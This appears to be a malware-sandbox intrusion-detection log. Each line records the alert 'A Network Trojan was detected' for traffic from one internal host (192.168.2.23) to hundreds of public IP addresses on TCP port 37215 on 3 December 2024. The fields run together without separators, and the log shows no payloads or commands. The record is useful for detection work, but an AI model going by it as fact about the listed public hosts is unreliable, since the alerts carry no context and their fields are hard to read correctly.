          2024-12-03T23:02:14.787568+010028352221A Network Trojan was detected192.168.2.233849641.29.43.12337215TCP
          2024-12-03T23:02:14.791740+010028352221A Network Trojan was detected192.168.2.2339612197.17.133.4937215TCP
          2024-12-03T23:02:14.792085+010028352221A Network Trojan was detected192.168.2.234062641.42.112.9037215TCP
          2024-12-03T23:02:14.792335+010028352221A Network Trojan was detected192.168.2.2354440197.25.2.2837215TCP
          2024-12-03T23:02:14.792612+010028352221A Network Trojan was detected192.168.2.2353770197.95.113.21137215TCP
          2024-12-03T23:02:14.792807+010028352221A Network Trojan was detected192.168.2.2339254197.122.183.13037215TCP
          2024-12-03T23:02:14.793140+010028352221A Network Trojan was detected192.168.2.2335976197.220.67.11237215TCP
          2024-12-03T23:02:16.559536+010028352221A Network Trojan was detected192.168.2.2357354156.96.122.22437215TCP
          2024-12-03T23:02:16.697217+010028352221A Network Trojan was detected192.168.2.2336916197.198.188.2037215TCP
          2024-12-03T23:02:16.909303+010028352221A Network Trojan was detected192.168.2.2343294156.208.58.15237215TCP
          2024-12-03T23:02:16.915546+010028352221A Network Trojan was detected192.168.2.2345290156.85.239.22237215TCP
          2024-12-03T23:02:16.931214+010028352221A Network Trojan was detected192.168.2.234165641.204.44.5137215TCP
          2024-12-03T23:02:16.931689+010028352221A Network Trojan was detected192.168.2.233394241.243.122.20937215TCP
          2024-12-03T23:02:16.946830+010028352221A Network Trojan was detected192.168.2.2358952197.213.172.17437215TCP
          2024-12-03T23:02:16.946977+010028352221A Network Trojan was detected192.168.2.233988441.223.100.16437215TCP
          2024-12-03T23:02:16.947073+010028352221A Network Trojan was detected192.168.2.2358152156.177.86.19537215TCP
          2024-12-03T23:02:16.947195+010028352221A Network Trojan was detected192.168.2.234524041.34.236.13237215TCP
          2024-12-03T23:02:16.956041+010028352221A Network Trojan was detected192.168.2.2360102156.199.249.20937215TCP
          2024-12-03T23:02:16.960300+010028352221A Network Trojan was detected192.168.2.2341356197.7.151.13237215TCP
          2024-12-03T23:02:16.987336+010028352221A Network Trojan was detected192.168.2.2355660197.174.22.10937215TCP
          2024-12-03T23:02:16.987460+010028352221A Network Trojan was detected192.168.2.2333060156.191.133.12137215TCP
          2024-12-03T23:02:16.987560+010028352221A Network Trojan was detected192.168.2.2353180156.1.156.16137215TCP
          2024-12-03T23:02:17.038096+010028352221A Network Trojan was detected192.168.2.2341106197.32.245.13637215TCP
          2024-12-03T23:02:17.282056+010028352221A Network Trojan was detected192.168.2.2344888197.232.54.24337215TCP
          2024-12-03T23:02:17.310407+010028352221A Network Trojan was detected192.168.2.2357092197.218.205.13337215TCP
          2024-12-03T23:02:18.044631+010028352221A Network Trojan was detected192.168.2.2354064197.191.214.2037215TCP
          2024-12-03T23:02:18.244118+010028352221A Network Trojan was detected192.168.2.2356764156.191.36.9337215TCP
          2024-12-03T23:02:18.244288+010028352221A Network Trojan was detected192.168.2.2356596197.175.190.9137215TCP
          2024-12-03T23:02:18.275583+010028352221A Network Trojan was detected192.168.2.236063041.206.186.4337215TCP
          2024-12-03T23:02:18.275706+010028352221A Network Trojan was detected192.168.2.2357656156.207.68.21737215TCP
          2024-12-03T23:02:18.275819+010028352221A Network Trojan was detected192.168.2.2360342156.64.9.16937215TCP
          2024-12-03T23:02:18.316093+010028352221A Network Trojan was detected192.168.2.234932041.54.199.19637215TCP
          2024-12-03T23:02:18.316106+010028352221A Network Trojan was detected192.168.2.2348012156.33.52.21737215TCP
          2024-12-03T23:02:18.386708+010028352221A Network Trojan was detected192.168.2.235424041.92.111.4437215TCP
          2024-12-03T23:02:18.386961+010028352221A Network Trojan was detected192.168.2.2345350156.131.234.24537215TCP
          2024-12-03T23:02:18.946946+010028352221A Network Trojan was detected192.168.2.2336032156.131.78.12637215TCP
          2024-12-03T23:02:18.947076+010028352221A Network Trojan was detected192.168.2.2353578197.221.56.14737215TCP
          2024-12-03T23:02:18.956234+010028352221A Network Trojan was detected192.168.2.2360600197.192.25.3637215TCP
          2024-12-03T23:02:19.243795+010028352221A Network Trojan was detected192.168.2.234715441.141.61.337215TCP
          2024-12-03T23:02:19.243940+010028352221A Network Trojan was detected192.168.2.2336858197.99.153.2037215TCP
          2024-12-03T23:02:19.300052+010028352221A Network Trojan was detected192.168.2.2347124197.67.155.1937215TCP
          2024-12-03T23:02:19.384539+010028352221A Network Trojan was detected192.168.2.2340346197.159.140.18237215TCP
          2024-12-03T23:02:19.393514+010028352221A Network Trojan was detected192.168.2.2342888156.199.133.1037215TCP
          2024-12-03T23:02:19.400154+010028352221A Network Trojan was detected192.168.2.233348441.224.91.19637215TCP
          2024-12-03T23:02:19.425289+010028352221A Network Trojan was detected192.168.2.234801841.121.183.14337215TCP
          2024-12-03T23:02:19.456303+010028352221A Network Trojan was detected192.168.2.2354492197.240.9.17837215TCP
          2024-12-03T23:02:19.456444+010028352221A Network Trojan was detected192.168.2.2351474197.156.215.7937215TCP
          2024-12-03T23:02:20.069121+010028352221A Network Trojan was detected192.168.2.2336870156.195.152.12837215TCP
          2024-12-03T23:02:20.384523+010028352221A Network Trojan was detected192.168.2.235998841.43.234.1937215TCP
          2024-12-03T23:02:20.400052+010028352221A Network Trojan was detected192.168.2.235038241.62.51.4537215TCP
          2024-12-03T23:02:20.431270+010028352221A Network Trojan was detected192.168.2.2344558197.22.131.22337215TCP
          2024-12-03T23:02:20.432278+010028352221A Network Trojan was detected192.168.2.2358404156.231.12.15437215TCP
          2024-12-03T23:02:20.446878+010028352221A Network Trojan was detected192.168.2.2340154197.127.169.4637215TCP
          2024-12-03T23:02:20.447009+010028352221A Network Trojan was detected192.168.2.2346322156.40.232.2937215TCP
          2024-12-03T23:02:20.456122+010028352221A Network Trojan was detected192.168.2.2346650156.5.80.22537215TCP
          2024-12-03T23:02:20.456205+010028352221A Network Trojan was detected192.168.2.2343598197.210.72.137215TCP
          2024-12-03T23:02:20.469923+010028352221A Network Trojan was detected192.168.2.233846241.173.232.15137215TCP
          2024-12-03T23:02:20.525129+010028352221A Network Trojan was detected192.168.2.233980041.62.95.1437215TCP
          2024-12-03T23:02:20.525282+010028352221A Network Trojan was detected192.168.2.2338652156.105.25.6037215TCP
          2024-12-03T23:02:20.572398+010028352221A Network Trojan was detected192.168.2.234970241.140.250.13037215TCP
          2024-12-03T23:02:20.581428+010028352221A Network Trojan was detected192.168.2.2352530197.116.252.5737215TCP
          2024-12-03T23:02:20.597121+010028352221A Network Trojan was detected192.168.2.235474041.89.102.22337215TCP
          2024-12-03T23:02:20.597262+010028352221A Network Trojan was detected192.168.2.2337208197.57.148.16137215TCP
          2024-12-03T23:02:21.697494+010028352221A Network Trojan was detected192.168.2.234376441.140.12.15337215TCP
          2024-12-03T23:02:21.697507+010028352221A Network Trojan was detected192.168.2.2339688197.93.17.17137215TCP
          2024-12-03T23:02:21.737720+010028352221A Network Trojan was detected192.168.2.2348160197.95.181.14737215TCP
          2024-12-03T23:02:21.737965+010028352221A Network Trojan was detected192.168.2.2354318156.16.141.16437215TCP
          2024-12-03T23:02:21.784393+010028352221A Network Trojan was detected192.168.2.235987241.224.43.9437215TCP
          2024-12-03T23:02:21.784774+010028352221A Network Trojan was detected192.168.2.235764241.194.8.2437215TCP
          2024-12-03T23:02:22.784784+010028352221A Network Trojan was detected192.168.2.2334968197.237.200.9037215TCP
          2024-12-03T23:02:23.556785+010028352221A Network Trojan was detected192.168.2.2357156156.4.226.10937215TCP
          2024-12-03T23:02:23.571968+010028352221A Network Trojan was detected192.168.2.235712641.34.110.9837215TCP
          2024-12-03T23:02:23.572097+010028352221A Network Trojan was detected192.168.2.234289041.93.86.18637215TCP
          2024-12-03T23:02:23.581298+010028352221A Network Trojan was detected192.168.2.2351574197.77.114.8037215TCP
          2024-12-03T23:02:23.581600+010028352221A Network Trojan was detected192.168.2.2359790156.3.237.12937215TCP
          2024-12-03T23:02:23.603189+010028352221A Network Trojan was detected192.168.2.233338041.29.70.15837215TCP
          2024-12-03T23:02:23.603331+010028352221A Network Trojan was detected192.168.2.235010841.59.229.5937215TCP
          2024-12-03T23:02:23.628541+010028352221A Network Trojan was detected192.168.2.2344028156.36.174.24237215TCP
          2024-12-03T23:02:23.659790+010028352221A Network Trojan was detected192.168.2.235267641.231.63.7137215TCP
          2024-12-03T23:02:24.713570+010028352221A Network Trojan was detected192.168.2.2349990197.249.234.11437215TCP
          2024-12-03T23:02:24.754041+010028352221A Network Trojan was detected192.168.2.235679441.99.146.18237215TCP
          2024-12-03T23:02:24.760291+010028352221A Network Trojan was detected192.168.2.2359106197.50.113.3937215TCP
          2024-12-03T23:02:24.769483+010028352221A Network Trojan was detected192.168.2.2333932156.124.218.20437215TCP
          2024-12-03T23:02:24.776359+010028352221A Network Trojan was detected192.168.2.234878841.191.132.3437215TCP
          2024-12-03T23:02:24.785338+010028352221A Network Trojan was detected192.168.2.235219641.28.29.2737215TCP
          2024-12-03T23:02:24.837680+010028352221A Network Trojan was detected192.168.2.235383441.68.184.2137215TCP
          2024-12-03T23:02:24.880627+010028352221A Network Trojan was detected192.168.2.2347234197.124.106.17537215TCP
          2024-12-03T23:02:24.880650+010028352221A Network Trojan was detected192.168.2.235520041.67.6.637215TCP
          2024-12-03T23:02:24.885344+010028352221A Network Trojan was detected192.168.2.2352656156.112.179.15337215TCP
          2024-12-03T23:02:24.900523+010028352221A Network Trojan was detected192.168.2.2341052156.13.14.22037215TCP
          2024-12-03T23:02:24.909635+010028352221A Network Trojan was detected192.168.2.2348996197.229.68.10237215TCP
          2024-12-03T23:02:25.072397+010028352221A Network Trojan was detected192.168.2.2350940197.116.245.9237215TCP
          2024-12-03T23:02:25.103533+010028352221A Network Trojan was detected192.168.2.233994041.22.66.10137215TCP
          2024-12-03T23:02:25.103541+010028352221A Network Trojan was detected192.168.2.236063241.216.151.17737215TCP
          2024-12-03T23:02:25.128436+010028352221A Network Trojan was detected192.168.2.235999041.235.147.11937215TCP
          2024-12-03T23:02:25.362893+010028352221A Network Trojan was detected192.168.2.234884441.146.239.21537215TCP
          2024-12-03T23:02:25.378087+010028352221A Network Trojan was detected192.168.2.2351124156.184.97.6737215TCP
          2024-12-03T23:02:25.409650+010028352221A Network Trojan was detected192.168.2.2357582197.253.75.1437215TCP
          2024-12-03T23:02:25.869872+010028352221A Network Trojan was detected192.168.2.2350348156.123.247.8837215TCP
          2024-12-03T23:02:25.870049+010028352221A Network Trojan was detected192.168.2.2333736156.172.76.22637215TCP
          2024-12-03T23:02:25.900490+010028352221A Network Trojan was detected192.168.2.2343848156.178.39.7137215TCP
          2024-12-03T23:02:25.909514+010028352221A Network Trojan was detected192.168.2.2341294156.49.222.9137215TCP
          2024-12-03T23:02:25.909617+010028352221A Network Trojan was detected192.168.2.2353348197.156.108.16737215TCP
          2024-12-03T23:02:25.909815+010028352221A Network Trojan was detected192.168.2.235699841.138.109.13737215TCP
          2024-12-03T23:02:25.956810+010028352221A Network Trojan was detected192.168.2.2344704197.104.106.5137215TCP
          2024-12-03T23:02:27.119123+010028352221A Network Trojan was detected192.168.2.233357641.180.145.15337215TCP
          2024-12-03T23:02:27.119124+010028352221A Network Trojan was detected192.168.2.2336220197.86.92.13837215TCP
          2024-12-03T23:02:27.119139+010028352221A Network Trojan was detected192.168.2.233793241.135.99.5837215TCP
          2024-12-03T23:02:27.337972+010028352221A Network Trojan was detected192.168.2.233890441.101.35.6237215TCP
          2024-12-03T23:02:27.369454+010028352221A Network Trojan was detected192.168.2.2344964197.240.40.19037215TCP
          2024-12-03T23:02:27.395369+010028352221A Network Trojan was detected192.168.2.2350132156.173.226.15337215TCP
          2024-12-03T23:02:27.409967+010028352221A Network Trojan was detected192.168.2.2336900197.49.205.2937215TCP
          2024-12-03T23:02:28.159608+010028352221A Network Trojan was detected192.168.2.2333066156.96.10.19737215TCP
          2024-12-03T23:02:28.175287+010028352221A Network Trojan was detected192.168.2.234066041.149.247.17737215TCP
          2024-12-03T23:02:28.197506+010028352221A Network Trojan was detected192.168.2.2343416197.150.11.10237215TCP
          2024-12-03T23:02:28.222183+010028352221A Network Trojan was detected192.168.2.233740641.89.83.21937215TCP
          2024-12-03T23:02:28.237809+010028352221A Network Trojan was detected192.168.2.2341204156.48.165.2937215TCP
          2024-12-03T23:02:28.244351+010028352221A Network Trojan was detected192.168.2.236049641.114.115.8237215TCP
          2024-12-03T23:02:29.417055+010028352221A Network Trojan was detected192.168.2.235507241.25.101.19637215TCP
          2024-12-03T23:02:29.463788+010028352221A Network Trojan was detected192.168.2.233479241.246.226.22637215TCP
          2024-12-03T23:02:29.463792+010028352221A Network Trojan was detected192.168.2.2345180156.168.222.5537215TCP
          2024-12-03T23:02:29.488742+010028352221A Network Trojan was detected192.168.2.235611441.126.42.8537215TCP
          2024-12-03T23:02:29.504120+010028352221A Network Trojan was detected192.168.2.233950041.55.74.2637215TCP
          2024-12-03T23:02:29.504141+010028352221A Network Trojan was detected192.168.2.2346838156.9.148.3037215TCP
          2024-12-03T23:02:30.300779+010028352221A Network Trojan was detected192.168.2.234152641.255.131.6737215TCP
          2024-12-03T23:02:30.322397+010028352221A Network Trojan was detected192.168.2.2335572156.221.148.13037215TCP
          2024-12-03T23:02:30.331415+010028352221A Network Trojan was detected192.168.2.2359508197.42.73.25437215TCP
          2024-12-03T23:02:30.331556+010028352221A Network Trojan was detected192.168.2.2342354197.160.205.25437215TCP
          2024-12-03T23:02:30.394274+010028352221A Network Trojan was detected192.168.2.235632441.48.66.19537215TCP
          2024-12-03T23:02:30.447422+010028352221A Network Trojan was detected192.168.2.234283041.243.14.5737215TCP
          2024-12-03T23:02:30.603370+010028352221A Network Trojan was detected192.168.2.2348128197.222.172.4137215TCP
          2024-12-03T23:02:30.603459+010028352221A Network Trojan was detected192.168.2.236062241.52.74.24137215TCP
          2024-12-03T23:02:30.603677+010028352221A Network Trojan was detected192.168.2.235698841.139.107.15737215TCP
          2024-12-03T23:02:30.651609+010028352221A Network Trojan was detected192.168.2.2345232156.65.82.23837215TCP
          2024-12-03T23:02:30.660952+010028352221A Network Trojan was detected192.168.2.2355928156.183.97.7737215TCP
          2024-12-03T23:02:30.661030+010028352221A Network Trojan was detected192.168.2.233948841.226.102.11637215TCP
          2024-12-03T23:02:30.741957+010028352221A Network Trojan was detected192.168.2.235652641.175.109.19737215TCP
          2024-12-03T23:02:31.363530+010028352221A Network Trojan was detected192.168.2.235321641.209.62.25437215TCP
          2024-12-03T23:02:32.347346+010028352221A Network Trojan was detected192.168.2.2354046156.187.167.9637215TCP
          2024-12-03T23:02:33.448079+010028352221A Network Trojan was detected192.168.2.234730841.172.169.19937215TCP
          2024-12-03T23:02:33.573363+010028352221A Network Trojan was detected192.168.2.2340024156.64.117.25037215TCP
          2024-12-03T23:02:33.619549+010028352221A Network Trojan was detected192.168.2.2350898197.75.48.20737215TCP
          2024-12-03T23:02:33.628313+010028352221A Network Trojan was detected192.168.2.2334272197.195.135.16337215TCP
          2024-12-03T23:02:33.628420+010028352221A Network Trojan was detected192.168.2.2333738197.193.244.22837215TCP
          2024-12-03T23:02:33.628525+010028352221A Network Trojan was detected192.168.2.2357056197.74.174.16937215TCP
          2024-12-03T23:02:33.659588+010028352221A Network Trojan was detected192.168.2.235365841.178.156.2237215TCP
          2024-12-03T23:02:33.659764+010028352221A Network Trojan was detected192.168.2.2349344156.89.113.1937215TCP
          2024-12-03T23:02:34.447299+010028352221A Network Trojan was detected192.168.2.2360666197.210.191.9737215TCP
          2024-12-03T23:02:34.447395+010028352221A Network Trojan was detected192.168.2.2333272156.115.140.15337215TCP
          2024-12-03T23:02:34.447522+010028352221A Network Trojan was detected192.168.2.2357180197.55.185.9337215TCP
          2024-12-03T23:02:34.463046+010028352221A Network Trojan was detected192.168.2.235736241.0.42.9537215TCP
          2024-12-03T23:02:34.463248+010028352221A Network Trojan was detected192.168.2.2349334197.97.70.14637215TCP
          2024-12-03T23:02:34.478839+010028352221A Network Trojan was detected192.168.2.2350226197.142.11.19137215TCP
          2024-12-03T23:02:34.478990+010028352221A Network Trojan was detected192.168.2.2337306156.151.41.8437215TCP
          2024-12-03T23:02:34.479127+010028352221A Network Trojan was detected192.168.2.234702841.57.81.15737215TCP
          2024-12-03T23:02:34.487677+010028352221A Network Trojan was detected192.168.2.233768641.43.114.6937215TCP
          2024-12-03T23:02:34.487911+010028352221A Network Trojan was detected192.168.2.2342138156.116.94.23437215TCP
          2024-12-03T23:02:34.494228+010028352221A Network Trojan was detected192.168.2.2338580156.66.171.22237215TCP
          2024-12-03T23:02:34.494327+010028352221A Network Trojan was detected192.168.2.2355624156.155.216.22437215TCP
          2024-12-03T23:02:34.494471+010028352221A Network Trojan was detected192.168.2.2336530197.217.127.11537215TCP
          2024-12-03T23:02:34.494750+010028352221A Network Trojan was detected192.168.2.2357502197.63.7.16837215TCP
          2024-12-03T23:02:34.494751+010028352221A Network Trojan was detected192.168.2.233902641.237.9.15937215TCP
          2024-12-03T23:02:34.494797+010028352221A Network Trojan was detected192.168.2.2336198156.249.107.4237215TCP
          2024-12-03T23:02:34.503413+010028352221A Network Trojan was detected192.168.2.2356278197.44.112.22337215TCP
          2024-12-03T23:02:34.503612+010028352221A Network Trojan was detected192.168.2.2351536156.182.13.6237215TCP
          2024-12-03T23:02:34.503754+010028352221A Network Trojan was detected192.168.2.233865841.70.88.1437215TCP
          2024-12-03T23:02:34.503843+010028352221A Network Trojan was detected192.168.2.2357202197.110.123.837215TCP
          2024-12-03T23:02:34.503999+010028352221A Network Trojan was detected192.168.2.234373241.120.63.20537215TCP
          2024-12-03T23:02:34.504197+010028352221A Network Trojan was detected192.168.2.233682841.67.56.6337215TCP
          2024-12-03T23:02:34.510043+010028352221A Network Trojan was detected192.168.2.2351106197.161.143.24337215TCP
          2024-12-03T23:02:34.519123+010028352221A Network Trojan was detected192.168.2.2342982197.248.78.3137215TCP
          2024-12-03T23:02:34.519226+010028352221A Network Trojan was detected192.168.2.2337328197.13.235.17037215TCP
          2024-12-03T23:02:34.525527+010028352221A Network Trojan was detected192.168.2.2360916156.68.236.16237215TCP
          2024-12-03T23:02:34.534697+010028352221A Network Trojan was detected192.168.2.2343146197.120.181.21437215TCP
          2024-12-03T23:02:34.535047+010028352221A Network Trojan was detected192.168.2.233887241.47.14.14837215TCP
          2024-12-03T23:02:34.535185+010028352221A Network Trojan was detected192.168.2.2337086197.224.161.25337215TCP
          2024-12-03T23:02:34.535433+010028352221A Network Trojan was detected192.168.2.2354314156.19.29.12937215TCP
          2024-12-03T23:02:34.535575+010028352221A Network Trojan was detected192.168.2.234425441.75.81.25037215TCP
          2024-12-03T23:02:34.535674+010028352221A Network Trojan was detected192.168.2.2352170156.71.181.12537215TCP
          2024-12-03T23:02:34.535785+010028352221A Network Trojan was detected192.168.2.2348000197.87.149.4237215TCP
          2024-12-03T23:02:34.535892+010028352221A Network Trojan was detected192.168.2.2349436156.254.180.037215TCP
          2024-12-03T23:02:34.536135+010028352221A Network Trojan was detected192.168.2.2358186197.15.7.1337215TCP
          2024-12-03T23:02:34.536184+010028352221A Network Trojan was detected192.168.2.2343886156.166.236.14837215TCP
          2024-12-03T23:02:34.550376+010028352221A Network Trojan was detected192.168.2.234911041.196.141.16637215TCP
          2024-12-03T23:02:34.566024+010028352221A Network Trojan was detected192.168.2.2341446156.43.34.3037215TCP
          2024-12-03T23:02:34.566142+010028352221A Network Trojan was detected192.168.2.235920841.220.151.11837215TCP
          2024-12-03T23:02:34.566253+010028352221A Network Trojan was detected192.168.2.2356174197.146.15.22937215TCP
          2024-12-03T23:02:34.650697+010028352221A Network Trojan was detected192.168.2.2334826197.166.47.22037215TCP
          2024-12-03T23:02:34.659889+010028352221A Network Trojan was detected192.168.2.235543441.23.147.22437215TCP
          2024-12-03T23:02:34.660119+010028352221A Network Trojan was detected192.168.2.2344836156.207.3.9437215TCP
          2024-12-03T23:02:34.775473+010028352221A Network Trojan was detected192.168.2.2358714197.17.9.6937215TCP
          2024-12-03T23:02:35.244062+010028352221A Network Trojan was detected192.168.2.2346756156.236.59.2437215TCP
          2024-12-03T23:02:35.525608+010028352221A Network Trojan was detected192.168.2.2354128156.155.14.14937215TCP
          2024-12-03T23:02:35.541389+010028352221A Network Trojan was detected192.168.2.2349326156.80.60.8437215TCP
          2024-12-03T23:02:35.550313+010028352221A Network Trojan was detected192.168.2.233801641.244.120.037215TCP
          2024-12-03T23:02:35.566008+010028352221A Network Trojan was detected192.168.2.235796841.170.240.3737215TCP
          2024-12-03T23:02:35.581737+010028352221A Network Trojan was detected192.168.2.2340238156.51.222.10137215TCP
          2024-12-03T23:02:36.447438+010028352221A Network Trojan was detected192.168.2.235937241.127.234.2637215TCP
          2024-12-03T23:02:36.463223+010028352221A Network Trojan was detected192.168.2.2352862156.240.60.22137215TCP
          2024-12-03T23:02:36.463282+010028352221A Network Trojan was detected192.168.2.234839041.182.226.17537215TCP
          2024-12-03T23:02:36.463541+010028352221A Network Trojan was detected192.168.2.2351504197.83.91.2237215TCP
          2024-12-03T23:02:36.463541+010028352221A Network Trojan was detected192.168.2.2350060197.171.35.8037215TCP
          2024-12-03T23:02:36.494832+010028352221A Network Trojan was detected192.168.2.2344090156.45.68.4737215TCP
          2024-12-03T23:02:36.494911+010028352221A Network Trojan was detected192.168.2.2356304156.214.11.17437215TCP
          2024-12-03T23:02:36.495174+010028352221A Network Trojan was detected192.168.2.2350214156.51.153.7537215TCP
          2024-12-03T23:02:36.495190+010028352221A Network Trojan was detected192.168.2.2353016197.129.182.13337215TCP
          2024-12-03T23:02:36.495254+010028352221A Network Trojan was detected192.168.2.2359938156.25.9.25037215TCP
          2024-12-03T23:02:36.495348+010028352221A Network Trojan was detected192.168.2.233505241.78.87.11337215TCP
          2024-12-03T23:02:36.495758+010028352221A Network Trojan was detected192.168.2.2355924156.126.202.19037215TCP
          2024-12-03T23:02:36.495902+010028352221A Network Trojan was detected192.168.2.233456241.220.68.20737215TCP
          2024-12-03T23:02:36.495986+010028352221A Network Trojan was detected192.168.2.2345440197.22.48.4937215TCP
          2024-12-03T23:02:36.496117+010028352221A Network Trojan was detected192.168.2.2343886197.239.201.137215TCP
          2024-12-03T23:02:36.496194+010028352221A Network Trojan was detected192.168.2.2346956197.164.134.8537215TCP
          2024-12-03T23:02:36.496350+010028352221A Network Trojan was detected192.168.2.233354641.221.126.13937215TCP
          2024-12-03T23:02:36.496422+010028352221A Network Trojan was detected192.168.2.2360694197.64.41.17037215TCP
          2024-12-03T23:02:36.496521+010028352221A Network Trojan was detected192.168.2.2342566156.25.84.12437215TCP
          2024-12-03T23:02:36.496603+010028352221A Network Trojan was detected192.168.2.2339072197.80.134.10437215TCP
          2024-12-03T23:02:36.496695+010028352221A Network Trojan was detected192.168.2.233929441.112.124.15237215TCP
          2024-12-03T23:02:36.503532+010028352221A Network Trojan was detected192.168.2.234272241.176.68.17737215TCP
          2024-12-03T23:02:36.503659+010028352221A Network Trojan was detected192.168.2.2336940197.201.223.6537215TCP
          2024-12-03T23:02:36.503806+010028352221A Network Trojan was detected192.168.2.233706241.89.154.18037215TCP
          2024-12-03T23:02:36.504008+010028352221A Network Trojan was detected192.168.2.234841641.122.68.14937215TCP
          2024-12-03T23:02:36.504136+010028352221A Network Trojan was detected192.168.2.2348210197.198.75.21737215TCP
          2024-12-03T23:02:36.504318+010028352221A Network Trojan was detected192.168.2.235059641.72.27.12937215TCP
          2024-12-03T23:02:36.504469+010028352221A Network Trojan was detected192.168.2.233910041.151.84.537215TCP
          2024-12-03T23:02:36.504583+010028352221A Network Trojan was detected192.168.2.2336984197.68.238.537215TCP
          2024-12-03T23:02:36.504690+010028352221A Network Trojan was detected192.168.2.2343282156.217.246.1437215TCP
          2024-12-03T23:02:36.519169+010028352221A Network Trojan was detected192.168.2.2352496156.5.172.3737215TCP
          2024-12-03T23:02:36.536048+010028352221A Network Trojan was detected192.168.2.234188441.122.171.18037215TCP
          2024-12-03T23:02:36.536481+010028352221A Network Trojan was detected192.168.2.2334210197.1.51.16137215TCP
          2024-12-03T23:02:36.536700+010028352221A Network Trojan was detected192.168.2.235105241.155.78.9437215TCP
          2024-12-03T23:02:36.536878+010028352221A Network Trojan was detected192.168.2.2342688197.112.69.11637215TCP
          2024-12-03T23:02:36.537067+010028352221A Network Trojan was detected192.168.2.2341888156.29.132.24837215TCP
          2024-12-03T23:02:36.537201+010028352221A Network Trojan was detected192.168.2.2339772156.2.126.9037215TCP
          2024-12-03T23:02:36.537311+010028352221A Network Trojan was detected192.168.2.2350972197.31.132.17237215TCP
          2024-12-03T23:02:36.537408+010028352221A Network Trojan was detected192.168.2.235611041.53.91.21537215TCP
          2024-12-03T23:02:36.785005+010028352221A Network Trojan was detected192.168.2.2348600156.210.120.12237215TCP
          2024-12-03T23:02:37.604065+010028352221A Network Trojan was detected192.168.2.2356538197.182.227.10037215TCP
          2024-12-03T23:02:37.604096+010028352221A Network Trojan was detected192.168.2.2344878197.93.227.21437215TCP
          2024-12-03T23:02:37.619521+010028352221A Network Trojan was detected192.168.2.2345916197.58.215.20837215TCP
          2024-12-03T23:02:37.635153+010028352221A Network Trojan was detected192.168.2.2346498197.209.232.15037215TCP
          2024-12-03T23:02:37.650940+010028352221A Network Trojan was detected192.168.2.2350436197.75.53.14137215TCP
          2024-12-03T23:02:37.659817+010028352221A Network Trojan was detected192.168.2.233523441.48.165.9037215TCP
          2024-12-03T23:02:37.659973+010028352221A Network Trojan was detected192.168.2.235368241.16.57.22137215TCP
          2024-12-03T23:02:37.660226+010028352221A Network Trojan was detected192.168.2.235949041.86.108.1137215TCP
          2024-12-03T23:02:37.691491+010028352221A Network Trojan was detected192.168.2.2332916156.111.178.17837215TCP
          2024-12-03T23:02:37.691556+010028352221A Network Trojan was detected192.168.2.2336666197.28.127.10137215TCP
          2024-12-03T23:02:37.691569+010028352221A Network Trojan was detected192.168.2.2359976197.195.182.11937215TCP
          2024-12-03T23:02:38.900884+010028352221A Network Trojan was detected192.168.2.2347016197.224.170.15037215TCP
          2024-12-03T23:02:38.909842+010028352221A Network Trojan was detected192.168.2.2335442197.213.20.9437215TCP
          2024-12-03T23:02:38.957027+010028352221A Network Trojan was detected192.168.2.235145041.254.32.137215TCP
          2024-12-03T23:02:39.650543+010028352221A Network Trojan was detected192.168.2.2348110156.179.192.6537215TCP
          2024-12-03T23:02:39.650726+010028352221A Network Trojan was detected192.168.2.2352590156.205.225.4337215TCP
          2024-12-03T23:02:39.650891+010028352221A Network Trojan was detected192.168.2.234478641.50.79.1537215TCP
          2024-12-03T23:02:39.650964+010028352221A Network Trojan was detected192.168.2.2359324156.88.157.15737215TCP
          2024-12-03T23:02:39.651055+010028352221A Network Trojan was detected192.168.2.235113241.219.54.3237215TCP
          2024-12-03T23:02:39.651180+010028352221A Network Trojan was detected192.168.2.2360546197.213.196.9137215TCP
          2024-12-03T23:02:39.651302+010028352221A Network Trojan was detected192.168.2.235787641.161.165.437215TCP
          2024-12-03T23:02:39.651503+010028352221A Network Trojan was detected192.168.2.2358998197.248.213.21637215TCP
          2024-12-03T23:02:39.651723+010028352221A Network Trojan was detected192.168.2.2351886156.68.81.537215TCP
          2024-12-03T23:02:39.651899+010028352221A Network Trojan was detected192.168.2.234656841.113.142.12037215TCP
          2024-12-03T23:02:39.652092+010028352221A Network Trojan was detected192.168.2.235781841.49.128.18637215TCP
          2024-12-03T23:02:39.652234+010028352221A Network Trojan was detected192.168.2.234320441.91.76.1737215TCP
          2024-12-03T23:02:39.660031+010028352221A Network Trojan was detected192.168.2.235080841.44.118.16637215TCP
          2024-12-03T23:02:39.660246+010028352221A Network Trojan was detected192.168.2.2338792156.101.76.24237215TCP
          2024-12-03T23:02:39.660372+010028352221A Network Trojan was detected192.168.2.2353126156.74.238.13237215TCP
          2024-12-03T23:02:39.666261+010028352221A Network Trojan was detected192.168.2.2341124156.30.229.14437215TCP
          2024-12-03T23:02:39.666380+010028352221A Network Trojan was detected192.168.2.233607641.64.56.9137215TCP
          2024-12-03T23:02:39.666550+010028352221A Network Trojan was detected192.168.2.2352098156.180.77.8337215TCP
          2024-12-03T23:02:39.666785+010028352221A Network Trojan was detected192.168.2.2359840156.70.150.19937215TCP
          2024-12-03T23:02:39.666935+010028352221A Network Trojan was detected192.168.2.235460641.149.22.7837215TCP
          2024-12-03T23:02:39.667079+010028352221A Network Trojan was detected192.168.2.2345408197.27.136.12937215TCP
          2024-12-03T23:02:39.667190+010028352221A Network Trojan was detected192.168.2.234588041.145.56.19037215TCP
          2024-12-03T23:02:39.667339+010028352221A Network Trojan was detected192.168.2.2354218197.54.19.3837215TCP
          2024-12-03T23:02:39.667450+010028352221A Network Trojan was detected192.168.2.2344762156.29.235.10237215TCP
          2024-12-03T23:02:39.667644+010028352221A Network Trojan was detected192.168.2.235799041.20.161.22037215TCP
          2024-12-03T23:02:39.667794+010028352221A Network Trojan was detected192.168.2.2351756156.189.155.6437215TCP
          2024-12-03T23:02:39.667914+010028352221A Network Trojan was detected192.168.2.2348012156.171.109.6737215TCP
          2024-12-03T23:02:39.675457+010028352221A Network Trojan was detected192.168.2.2337272156.26.109.17137215TCP
          2024-12-03T23:02:39.675639+010028352221A Network Trojan was detected192.168.2.235856441.69.248.23337215TCP
          2024-12-03T23:02:39.691075+010028352221A Network Trojan was detected192.168.2.2355250156.125.208.5237215TCP
          2024-12-03T23:02:39.691193+010028352221A Network Trojan was detected192.168.2.2357010156.155.106.16037215TCP
          2024-12-03T23:02:39.706674+010028352221A Network Trojan was detected192.168.2.234263641.203.148.11937215TCP
          2024-12-03T23:02:39.706840+010028352221A Network Trojan was detected192.168.2.234594641.140.235.17037215TCP
          2024-12-03T23:02:39.707006+010028352221A Network Trojan was detected192.168.2.2356692197.225.104.8537215TCP
